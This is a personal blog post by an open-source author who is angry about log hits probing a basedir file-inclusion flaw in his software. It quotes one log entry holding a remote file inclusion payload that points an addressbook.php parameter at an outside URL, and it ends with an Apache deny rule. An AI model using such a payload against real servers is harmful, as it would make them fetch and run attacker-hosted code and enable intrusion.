Open source software security

Asshole Hackers

30 November -0001

So I started up logging on this site the other day, mostly out of curiosity. I was completely disheartened as soon as I did though. Come to find out some of the most common hits on the site are by people looking to exploit a basedir file inclusion vulnerability. What's worse, this is a vulnerability that exists in some of the software I've written and released open source. In any case, these assholes are basically trying to break into my server by exploiting this vulnerability.

What pisses me off most about this is that I'm the freakin' author of the software that was vulnerable - and I'm the one who wrote the patch. Who are these people? They're blindly trying the exploit against other software that doesn't even have the same code base. For instance:

Type	page not found
Date	Thursday, July 19, 2007 - 10:00
User	Anonymous
Location	http://justin.madirish.net/?q=taxonomy/addressbook.php?GLOBALS[basedir]=http://nxlf.cn/1??
Referrer	
Message	taxonomy/addressbook.php?GLOBALS[basedir]=http://nxlf.cn/1??
Severity	warning
Hostname	163.23.78.1

Who is 163.23.78.1? Well, lets do some checking and find out. ARIN reports that this is someone in APNIC. I fucking hate people on APNIC. They're responsible for like 90% of the spam I get and now they're trying to hack my servers. Well guess what assholes? I'm dropping the entire APNIC range ( 163.13.0.0 - 163.32.255.255) into a blacklist so my server doesn't respond to your requests.

This might be a little overkill in terms of response, but frankly the information on my site is totally free. I don't get anything out of sharing it, and this sort of crap makes me want to yank the whole thing. Anywhoo, for now I'm dropping a couple extra lines into httpd.conf

Deny from 163.23